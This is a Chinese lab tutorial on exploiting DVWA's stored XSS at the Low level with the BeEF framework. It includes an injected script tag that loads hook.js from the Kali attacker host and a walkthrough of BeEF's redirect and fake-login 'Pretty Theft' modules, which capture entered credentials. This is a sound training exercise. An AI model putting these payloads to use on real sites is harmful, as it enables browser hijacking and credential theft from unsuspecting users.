DVWA-XSS(Stored)-beef

用Low Level来测试beef的使用

beef配置

如果kali没有beef的,进行下载

bash 复制代码
apt install beef-xss

使用

bash 复制代码
beef-xss         # 命令方式启动
beef-xss-stop    # 命令方式关闭 
systemctl start beef-xss.service   #开启beefsystemctl 
stop beef-xss.service     #关闭beefsystemctl 
restart beef-xss.service  #重启beef

打开beef web界面

beef连接

拿Low Level 的xss漏洞测试

beef hook.js的链接为:http://192.168.20.145:3000/hook.js 145为kali IP。

输入666<script src="http://192.168.20.145:3000/hook.js"></script>

前端message处,前端做了输入长度限制,用burp抓包或者直接在前端界面修改长度限制都可以。

当客户端打开界面时192.168.20.1主机上线。(打开浏览器界面的主机会上线)

beef功能

Details:受害者浏览器信息

Logs:记录浏览器操作记录

Commands:向受害者发送指令的模块

下面记录几个功能

  1. 页面重定向

    选中Redirect Browser模块,右侧输入想要跳转到的网址

  2. 弹窗

    Pretty Theft模块,Dislog Type可以选择不同弹窗,这里用facebook做演示,Custom Log处选kali的IP。

    弹窗,输入账号密码。

    在beef的history处可以查看账号密码。

相关推荐
独行soc5 小时前
#渗透测试#SRC漏洞挖掘#深入挖掘XSS漏洞02之测试流程
web安全·面试·渗透测试·xss·漏洞挖掘·1024程序员节
morris13114 小时前
【SpringBoot】Xss的常见攻击方式与防御手段
java·spring boot·xss·csp
假客套2 天前
【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
网络安全·xss·dvwa靶场·dvwa xss靶场·web渗透、
假客套2 天前
【dvwa靶场:XSS系列】XSS (DOM) 低-中-高级别,通关啦
网络安全·xss·web渗透·dvwa靶场·dvwa xss靶场
阿宝分享技术2 天前
从xss到任意文件读取
前端·xss
儋州小丑,原号没了,靠北3 天前
XSS-libs
前端·xss
Yue1one5 天前
Xss_less靶场攻略(1-18)
网络安全·xss
残月只会敲键盘6 天前
ctfshow--xss靶场web327-web333(一命速通不了的靶场)
前端·web3·xss
小野猪都有白菜拱7 天前
XSS小游戏【1-13关】
xss
掌控安全EDU9 天前
安全研究 | 不同编程语言中 IP 地址分类的不一致性
网络协议·tcp/ip·安全·xss